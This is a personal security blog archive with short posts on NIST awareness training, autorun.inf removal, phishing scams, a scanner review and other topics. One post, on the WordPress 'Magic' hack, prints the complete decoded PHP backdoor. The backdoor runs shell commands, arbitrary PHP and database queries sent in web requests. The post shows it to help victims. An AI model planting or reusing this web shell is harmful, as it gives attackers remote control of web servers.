elamb » Computer Security

ia awareness training

elamb.security — Mon, 29 Aug 2011 15:12:20 +0000

Information Assurance Awareness Training

NIST Special Publication 800-50, is a regulation dedicated to IA Awareness Training

NIST SP 800-5, Building an Information Technology Security Awareness & Training Program

The 800-50 includes guidance on development and sustainment of an awareness & training IT Security (aka information assurance training) program for all users, employees and supervisors within an organization. Having a training program is mandated by the Federal Information Security Act of 2002.

IA Awareness Training – Roles & Responsibilities

Agency heads – must ensure that high priority is given to effective security awareness and training for employees. Appoint a CIO
CIO – Establish overall strategy, funding, tracking and report is in place for the IT security awareness and training program
IT Security Program Manager – tactical deployment, development and maintenance of the IT security & awareness program.
Managers – responsible for complying with IT security awareness program. Work with CIO and IT Security Program Managers to share responsibility. Ensure all users are trained to fulfill their security roles before access is giving. Promote professional development and certification of the IT staff.
Users – largest audience in any organization and are the single most important group of people who can help to reduce unintentional errors.

800-50 calls learning a “continuum”. The continuum of learning starts awareness and builds into education.
Awareness – awareness is not training. Awareness focuses on security concerns to ensure users are mindful of basic rules and issues in a given environment.

Awareness is not training. The purpose of awareness presentations is simply to focus attention on security. Awareness presentations are intended to allow individuals to recognize IT security concerns and respond accordingly. – 800-50

Training – is a formal focused method to develop a skill for job performance.
Training strives to produce relevant and needed security skills and competencies – 800-50

Education – combines multidisciplinary areas into a common body of knowledge.

Education integrates all of the security skills and competencies of the various functional specialties into a common body of knowledge . . . and strives to produce IT security specialists and professionals capable of vision and pro-active response. –800-50

What is Autorun.inf?

brenz — Wed, 23 Feb 2011 23:00:34 +0000

What is AutoRun.inf?
What exactly is an autorun.inf? Is it a virus or just a file that needed by other application in our computer to run? Have you ever gotten alerted by your system anti-virus application that autorun.inf was detected as a threat to your computer?

AutoRun.inf is a primary instruction file associated with Autorun function. Autorun.inf is just a simple text-based configuration file that tells the operating system which executable to start or which icon to use. In other words, Autorun.inf simply tells the operating system how to deal on the programs or executable files and how the operating will treat the contents of a CD or any removable disks that is plug to your computer.

Autorun.inf is not a malware, but a virus might use autorun.inf to get access to your computer programs and files. Common virus like bacalid, ravmon.exe and even Trojan virus hides in autorun.inf to easily spread to your computer. These viruses save themselves in the root directory of the infected hard disks and will run themselves every time you double click the drive. Usually if a USB stick or a CD was infected by a virus, once it was plugged to your computer the device automatically runs itself especially with the device where autorun was enabled.

If autorun.inf was detected by your anti-virus as a threat to your computer but not yet tried to make an action then here are some tips to remove autorun.inf which are infected by virus.

You can disable autorun.inf for all drives by configuring the registry of your computer. First you need to open the registry by typing regedit.exe to the command prompt or you may execute it in run. Then look for this registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Double-click the NoDriveAutorun DWORD entry and type the value HEX: FF (255 in Decimal). (If the NoDriveAutorun does not exists, you can create it by right-clicking the right side area of the regedit window, then click New->DWord Value -> type NoDriveAutorun) Close the registry and restart the computer. This procedure will disable all the autorun for all drives of your computer and at least will prevent the autorun function of infected USB drives or CDs and avoid the infection of viruses like the Bacalid and RavMon.exe.

Another procedure to disable or delete autorun.inf that has been infected by virus is by using the command prompt, type cd\ then press enter. You may type the letter of your USB drive or CD drive, for example F: then press enter. Type this attrib –h –r –s autorun.inf then press enter, type del autorun.inf.That’s the easiest way to avoid spreading virus from your computer especially using sutorun.inf. If you have any questions, you can comment on this post, thank you!

SAP security audit programs

elamb.security — Sat, 16 Oct 2010 04:03:18 +0000

SAP- Increasing Demand by Increasing Efficiency

Systems, applications, Products (SAP) is a security auditing program that checks a computer systems data integrity and overall security. This application is accompanied by a user interface that is highly flexible. SAP security audit programs were introduced in the 1980s and provides the best audit resources for major companies and industry leaders.

In SAP, audit security is the foremost requirement enabling access control and separation of duties. These two areas are very important for the integration of control mechanisms. A company must plan prior to implementing SAP to obtain better access and a clear understanding of the system. This includes proper design of profile and removal of surplus IDs. Security audit programs includes many audit procedures that are designed to efficiently access a variety of transactions.

The main administrative function of SAP security Audit Programs includes automatic scheduling of jobs according to different user IDs, monitoring errors, administering backdrop session and access to proper management functionality. As far as security settings are concerned, SAP system audit program helps to execute online programs using different procedures and maintenance of different tables. This allows access to maintain different profile parameters including password and security of default user IDs. SAP system audit programs also allow locking of sensitive codes of transactions and execution of OS commands externally.

The SAP system audit program contains different audit procedures showing steps to extract useful information from a system. Some system audit program resources are highly beneficial and include audit programs for financial accounting, audit programs for basic security, audit programs for Fixed Asset, audit programs for expenditures, audit programs for treasury, audit programs for inventory management, audit programs for HR & payroll and audit programs for revenue. Companies using SAP applications can create different software packages to meet their key objectives. This application is assembled in such a way that allows each department of an organization to get integrated.

google’s Safe Browsing Alerts

elamb.security — Tue, 12 Oct 2010 01:51:19 +0000

The all seeing eye of Google is upon Safe browsing and and alerts for your network. I think this is proof that Google is not “evil” as some say. Some believe that Google is “evil” just because they want to organize all of the worlds data. To this I say, “stop, hatin’!”

Google has taken steps toward protecting is users from malware and phishing attacks by alerting webmasters of malicious content and bad URLs.

Now Google offers a service for Network Administartors that allows system owners to receive early notifications for malicious content on their network. Its called “Google Safe Browsing Alerts“. As an example of how powerful this can be, imagine an Internet Service Provider have such a service.

I can already hear the “nayers of google” crying, “what about the privacy of the networks and your users?” To this I say, “SHUT THE HELL UP!” Google loves you. Google died for your sins. Repent, for the kingdom of Google is at hand.
http://safebrowsingalerts.googlelabs.com/

That is all.

http://googleonlinesecurity.blogspot.com/2010/09/safe-browsing-alerts-for-network.html

Facebook Imposter Scam

elamb.security — Sun, 17 Jan 2010 08:52:21 +0000

The first time I saw the “impostor scam” was on myspace. One after another about 6 or 7 of my friends myspace accounts were hijacked. What followed was my friends sending me messages about viagra and bogus malware sites. It was obvious that they’d been hacked, but they usually catch it a few days later and send out a message to apologize to everyone. It seems not social network is exempt from the imposter scam.

Enter the Facebook Imposter Scam:
The Facebook Imposter Scam is the same exploit that hit myspace. Users accounts are hacked using phishing techniques. Basically, users are lured into clicking on what looks like a legitimate link, they are scammed into giving out their username and password (sometimes with a phishing site that looks like “facebook” a “facebook imposter”). Once the user enters the username password, the criminal has there information and can do whatever they want. What they typically do is use the account to advertise a product, service or scam to EVERY friend on the victims list. The facebook imposter will even use the victim’s account to scam others.

This scam earned its way on the Internet Crime Complaint Center.

The best way to avoid falling prey to this imposter scam, is to watch out for outbound links. Always hover over alink and look at the bottom right-hand corner of the browser to see where it is actually going. Type in the supposed link into the address bar rather than clicking on outboud links. Pay attention to phishing warnings that myspace, search engines, browsers and facebook give you.

Server at Magic Requires Username Password

elamb.security — Sat, 08 Aug 2009 05:32:08 +0000

The WordPress “Magic” hack!

If your getting this message: “The server (our server domain, e.g. DOMAIN.COM) at Magic” Then you likely have infected code in your wordpress blog.

Wordpress Magic Attack

WordPress user Yokima reported this very slick hack.

FIX ACTION:
And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that “serve at Magic” message box. Although updating the the wordpress blog definitely fixes the issue, you may have to reload your pluggins too because they may also have some infect code. Doing further research on this matter.

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode so we decoded the string and found this php code:

{


if (!function_exists('______safeshell'))
{
function ______safeshell($komut) {
@ini_restore("safe_mode");
@ini_restore("open_basedir");
$disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
if (!empty ($komut)) {
if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
//@ ob_start();
@ passthru($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('system') && !in_array('system', $disable_functions)) {
//@ ob_start();
@ system($komut);
//$res = @ ob_get_contents();
//@ ob_end_clean();
}
elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
$res = @ shell_exec($komut);
echo $res;
}
elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
@ exec($komut, $res);
$res = join("\n", $res);
echo $res, "\n";
}
elseif (@ is_resource($f = @ popen($komut, "r"))) {
//$res = "";
while (!@ feof($f)) {
//$res .= @ fread($f, 1024);
echo(@ fread($f, 1024));
}
@ pclose($f);
}
else
{
$res = {$komut};
echo $res;
}
}
}
};
if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {
echo "
\n";
if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {
eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {
______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
}
else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {
$result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
if (!$result)
{
echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
die();
}
else if (is_resource($result))
{
$res = array();
while ($row = mysql_fetch_assoc($result))
{
$res[] = $row;
};
mysql_free_result($result);
echo serialize($res);
die();
}
else
{
echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
die();
}
};
echo "\n\n";
die();
};

};

p.s: don’t feel too bad, even the security masters get hacked by malicious S.O.B’s.

GFI LANGuard – Review

elamb.security — Sat, 08 Aug 2009 03:47:38 +0000

I was given the honor of reviewing GFI LANguard network and security scanner. Right off the bat I notice that the interface is very intuitive & easy to use, which is important to a busy security professional that have better things to do with their time than fight with a messy
security tool.

The network scanning tool I normally use is called Retina.
When lining the two up, I have to say Retina is much more powerful, with many more options built in. It can drill way down and do intrusive scans where GFI LANguard v.9 is pretty vanilla. It gives you what you need and that is it.

The simplicity could be an advantage to a system admin doing a security job, because it really is straight to the point. The cost is definitely and advantage. GFI LANguard is about Â½ the cost of the Retina Scan tool.

Retina Professional Edition 16 IP Pack – $995.00

GFI LAN Guard goes for about 300+ for 10 licences.

Nessus is considered one of the best network scan tools but its more expensive then both.

What I really like about Retina is that it allows you to scan in accordance with Department of Defense standards, SAN, and others. Languard does look at the SANS Top 20 report vulnerabilities.

If your looking for basic, down to Earth network & security scanner for your small to medium business needs, than GFI Languard is definitely the way to go because you will not beat the cost for the quality and support you get. Its going to give you a thorough assessment of the your systems and even tell you how to fix them. Buy this product!

Dangers of Surfing the Web with an Admin Account

elamb.security — Sat, 16 May 2009 03:50:52 +0000

If you bought a Dell or Gateway, more than likely you only have one account on your computer with no password. That account runs as the administrator. If your system has no user name or password applied, it is running as an administrator account.

This is how so many people get viruses. When you surf the web as an administrator is allows malicious applications (viruses, worms, Trojans and other malware) to download to your computer and run as the administrator. This means they can replace system files with viruses, create back doors and harm other computers on your network. They can also spy on you manipulate your browser or do anything else they want to do.

One way to greatly minimize the effects of viruses is to create accounts on your system and only use the administrator account when its necessary. Create a limited user account that you use when surfing the web, getting into your email or doing other small tasks that donâ€™t require downloading or installing applications.

With a limited account, even if the malware is downloaded, it will not be able to install.

Scientists launch new, ‘unbreakable’ encryption system

elamb — Thu, 09 Oct 2008 14:38:42 +0000

A new encryption system, which its creators say is unbreakable, got its first test run Wednesday in Vienna, scientists from the European Union project SECOQC announced.

digg user kinthiri explains:
Quantum cryptography is unbreakable because if any 3rd party views it that does not have the credentials and is not the intended recipient, the simple viewing of the encrypted data by that third party changes that data such that even the intended recipient can’t decrypt it. Thus they know that there is a 3rd party viewing the stream. Effectively the data self destructs if anyone attempts to intercept it or decrypt it. This is not a new phenomenon.

What is new is that its being used commercially. It had previously been used experimentally by the military in association with researchers, but this is the first time its been brought to life outside test environments and is available commercially.

The nature of quantum mechanics makes this truly unbreakable. You couldn’t even factor this using your own quantum computer, if you could even get one with enough qbits.

read more | digg story